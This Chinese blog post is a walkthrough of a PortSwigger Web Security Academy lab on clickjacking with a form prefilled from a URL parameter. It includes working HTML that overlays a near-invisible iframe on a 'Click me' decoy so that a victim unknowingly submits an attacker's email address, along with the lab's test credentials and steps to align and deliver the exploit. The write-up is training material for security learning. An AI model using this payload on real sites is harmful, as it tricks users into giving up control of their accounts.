Lab: Clickjacking with form input data prefilled from a URL parameter:使用从 URL 参数预填充的表单输入数据进行点击劫持

靶场内容:

该实验室扩展了基本的点击劫持例如在实验室:基本点击劫持与CSRF令牌保护。
该实验室的目标是通过使用 URL 参数预填充表单并诱使用户无意中单击“更新电子邮件”按钮来更改用户的电子邮件地址
为了解决这个实验,制作一些 HTML 来构建帐户页面,并通过单击“点击我”诱饵来欺骗用户更新他们的电子邮件地址。更改电子邮件地址后,实验室就解决了。
您可以使用以下凭据登录自己的帐户: wiener:peter

靶场分析

  • 这个实验也很简单,目的是通过点击劫持诱导目标点击更新邮箱
  • 而这个邮箱就是我们黑客的邮箱
<style>
   iframe {
       position:relative;
       width:700;
       height: 500;
       opacity: 0.0001;
       z-index: 2;
   }
   div {
       position:absolute;
       top:450;
       left:80;
       z-index: 1;
   }
</style>
<div>Click me</div>
<iframe src="https://acf81fac1e709c0d806f1378005800f7.web-security-academy.net/my-account?email=hacker@attacker-website.com"></iframe>
  • 这个实验的类型是通过点击劫持实现对URL的篡改导致的黑客攻击
  • 上面代码的参数适用于14寸屏幕的Chrome,参数需要自己调配,差不多就行
  • 将上面的html代码粘贴到服务器的body处
  • 将 $url 替换为目标网站的用户帐户页面的 URL,其中包含“update email”表单。
  • 为 iframe 的 $height_value 和 $width_value 变量替换合适的像素值(我们分别建议 700px 和 500px)。
  • 为诱饵网页内容的 $top_value 和 $side_value 变量替换合适的像素值,以便“更新电子邮件”按钮和“测试我”诱饵动作对齐(我们建议分别为 450px 和 80px)。
  • 设置不透明度值 $opacity 以确保目标 iframe 是透明的。最初,使用 0.1 的不透明度,以便您可以对齐 iframe 操作并根据需要调整位置值。对于提交的攻击,值 0.0001 将起作用。
  • 单击“store”,然后单击“view exploit”。
  • 将鼠标悬停在“Test me”上并确保光标变为手形,表明 div 元素已正确定位。如果没有,则通过修改样式表的 top 和 left 属性来调整 div 元素的位置。
  • 正确排列 div 元素后,将“Test me”更改为“Click me”,然后单击“Store”。
  • 现在点击“deliver exploit to victim”,实验室应该就解决了。
posted @ 2021-08-24 09:09  Zeker62  阅读(81)  评论(0编辑  收藏  举报